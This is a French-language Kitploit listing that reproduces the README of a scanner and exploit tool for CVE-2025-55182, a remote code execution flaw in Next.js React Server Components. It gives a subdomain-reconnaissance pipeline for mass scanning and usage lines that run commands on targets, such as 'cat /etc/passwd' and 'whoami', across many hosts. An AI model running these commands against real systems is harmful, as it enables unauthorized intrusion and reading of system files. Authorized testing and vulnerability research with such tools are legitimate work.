Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-Simple-Scanner — Scanner RCE haute fidélité pour CVE-2025-55182 affectant Next.js RSC. Prend en charge le scan de masse, l'exécution de commandes et les pipelines de reconnaissance automatisés. Conçu pour les pentesters, les chercheurs et les chasseurs de primes. | Kitploit
Outils/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

Scanner RCE haute fidélité pour CVE-2025-55182 affectant Next.js RSC. Prend en charge le scan de masse, l'exécution de commandes et les pipelines de reconnaissance automatisés. Conçu pour les pentesters, les chercheurs et les chasseurs de primes.

Voir le dépôt
il y a 8 moisPas encore vérifié
Partager

CVE-2025-55182 : Scanner RCE pour React Server Components

Une boîte à outils complète pour détecter et exploiter CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance (RCE) dans les applications Next.js utilisant React Server Components.

Ce dépôt propose un scanner Bash unifié (mode cible unique et mode masse), des implémentations Python/Go, ainsi qu'un workflow de reconnaissance pour le bug bounty.

Scanner Menu Scanner Demo


📂 Structure du dépôt

  • scanner.sh — Script Bash tout-en-un pour le scan de cible unique et le scan de masse
  • python/exploit.py — Implémentation Python stable (meilleur échappement JSON)
  • go/main.go — Implémentation haute performance (compilable)

🚀 Workflow de reconnaissance (méthodologie Bug Bounty)

Pour la chasse de masse sur les domaines wildcard, utilisez ce pipeline pour filtrer les cibles avant le scan :

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Utilisation du scanner Bash (recommandé)

Le script scanner.sh prend en charge les scans de cible unique et les scans de masse à partir d'une liste de fichiers.

🔧 Installation

root@kitploit:~
chmod +x scanner.sh

1️⃣ Mode cible unique

Idéal pour vérifier une cible spécifique avec une sortie détaillée.

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Mode scan de masse

Scanne efficacement une liste d'URL et enregistre les hôtes vulnérables dans un fichier.

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

Options


🐍 Version Python

Utilisez cette version si vous rencontrez des problèmes avec l'échappement des caractères spéciaux dans Bash.

Prérequis

root@kitploit:~
pip install requests

Utilisation

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Version Go

Haute performance, dépendances minimales.

Exécution directe

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Compilation du binaire

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests de sécurité autorisés. Toute utilisation non autorisée est strictement illégale. Le développeur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce programme.


🔗 Références

  • Détail CVE NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Avis de sécurité React (vulnérabilité React Server Components) : https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Modèle Nuclei ProjectDiscovery : https://cloud.projectdiscovery.io/library/CVE-2025-55182

Télécharger l’outil
FlagDescription
-d, --domainURL de la cible unique
-l, --listFichier contenant la liste des URL
-c, --commandCommande à exécuter (par défaut : id)
-o, --outputFichier de sortie pour les hôtes vulnérables (par défaut : vulnerable_hosts.txt)